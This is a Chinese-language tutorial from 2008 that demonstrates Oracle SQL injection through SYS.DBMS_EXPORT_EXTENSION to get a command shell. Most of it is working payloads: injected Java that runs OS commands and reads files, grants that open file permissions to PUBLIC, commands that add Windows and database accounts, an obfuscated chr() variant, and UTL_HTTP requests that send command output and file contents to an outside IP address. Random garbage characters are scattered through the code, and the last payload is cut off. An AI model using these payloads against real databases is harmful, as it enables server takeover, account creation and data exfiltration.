
实例演示oracle注入获取cmdshell的全过程

以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
的形式即可。(用" 'a'|| "是为了让语句返回true值)
语句有点长,可能要用post提交。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件(这一步之所以能以SYS身份执行,前提是数据库未打相应补丁且PUBLIC仍对SYS.DBMS_EXPORT_EXTENSION拥有EXECUTE权限;撤销该权限或打补丁即可阻断后续所有步骤):
/xxx.jsp?id=1 and '1'<>'a'||(
) q  A; `& N& }. X6 w5 ~& _) Mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  G1 x" j5 i# Vcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(+ K0 @) f' U* U  j8 r, V
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}: G7 Q  Q+ c1 Z& M4 V
}'''';END;'';END;--','SYS',0,'1',0) from dual ! l6 T  L# w6 g: \
)
------------------------
如果url有长度限制,可以把readFile()函数块去掉,即:
% @- L$ m  [1 O( w" e/xxx.jsp?id=1 and '1'<>'a'||(
; w. F; Q, Q0 ~. cselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''* r: ], _4 x8 `: x3 v9 E
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
8 x" E, x5 `: _8 w) n, b( H! Mnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}6 b+ G* a7 C) C4 N
}'''';END;'';END;--','SYS',0,'1',0) from dual
7 u6 F4 x% a5 d4 M* w' @4 ~)
同时把后面步骤提到的对readFile()的处理语句去掉。
------------------------------
2.赋Java权限
' u" o1 j! p' c/ Pselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual8 d/ \8 q$ k/ @9 ^0 s5 O+ y
3.创建函数
( K& M8 ^  d0 h. m5 rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''4 Y0 t, A! |2 X: v6 e( O
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual  G- }- O5 z4 M% Y3 p2 r
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''& F5 n+ ]6 Y: n* z
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual- o; d2 F8 y9 S& f0 s3 B
4.赋public执行函数的权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual6 |$ U" {) e- a5 b
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5.测试上面的几步是否成功
and '1'<>'11'||(
* _+ m( e& Q1 z7 O2 `7 bselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' 9 y, ]& W7 L( i- Z+ l$ ]7 i( I
)
" I, ~: r% E8 G- jand '1'<>(
( m8 o/ c; c8 x1 E( N& mselect  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' * p: X5 w* p6 z1 [7 U
) 2 I  Q& K, i4 g  Q' A
6.执行命令:
/xxx.jsp?id=1 and '1'<>(
9 R! Q" E' u2 w3 ~8 l+ X+ Kselect  sys.LinxRunCMD('cmd /c net user linx /add') from dual 5 {1 H2 t8 r/ y7 c, s5 E0 [" Z

5 i3 Q) F' N' h$ l  |6 g- t0 i)
7 B% \) V. }0 y5 d3 G5 `/xxx.jsp?id=1 and '1'<>( ( X7 c4 R6 \) ~1 F6 d) N
select  sys.LinxReadFile('c:/boot.ini') from dual
% E6 j# W! \' x& O1 C" B& {  o" M) L; k& I5 `+ P
)
* r3 A  ?3 [4 ^8 r" }4 o! x2 G  1 \6 Q' i5 s. c) h2 a: q
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union :
, j# d9 Q- u; \- H/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual0 V( u1 R# V8 H3 x/ a1 s6 C
或者UTL_HTTP.request(:
/xxx.jsp?id=1 and '1'<>( $ `+ h: i! V7 B
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
& f$ Q5 \  l3 u) 2 O- I1 w8 Q  |2 S
/xxx.jsp?id=1 and '1'<>(
/ K/ e  A; H' m' H" z' Z5 dSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual. G$ V& x0 o9 Z- g
) ( ^. ]0 u) F' t: ~
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
--------------------
6.内部变化
通过以下命令可以查看all_objects表的改变:
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'0 a2 P* T* K$ e; j. P: R
7.删除我们创建的函数
5 k5 h/ V0 V2 p7 F7 `select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
) h. X. m, p4 f8 Xdrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法:
创建oracle帐号:
( M4 I' ^( C9 G/ }9 J* Q/ H+ aselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''5 Q0 [0 J- L6 ?* R, I
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual4 R5 ?6 Z! e7 Q' `1 _
即:
* Q( a4 f  i' R* b8 x0 F6 ~) Iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
8 `/ F! o) [- _) q  zchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual ( x% ~' ]/ r  A
确定漏洞存在:
4 U1 J9 \9 [3 b) p: T' z/ B1 o2 |1<>(
  O: [5 g0 {" o+ r; ^+ eselect user_id from all_users where username='LINXSQL'
, O: r% Y3 e2 d; k) \)
给linxsql连接权限:
5 C* L& @3 u* u& {, sselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 ?+ \8 e$ e7 Q; xGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
# s( N; X3 l0 I, w& Wdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用的话可以考虑grant dba to 当前的User:
" j/ t9 m" T9 B  I1.jsp?id=1 and '1'<>( - f# [/ G( P6 T, r- a5 m
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''  Q9 m1 D9 U0 s7 ~; O
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
1 n5 k' @* \- {) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE3 C6 L3 K4 d# L
 )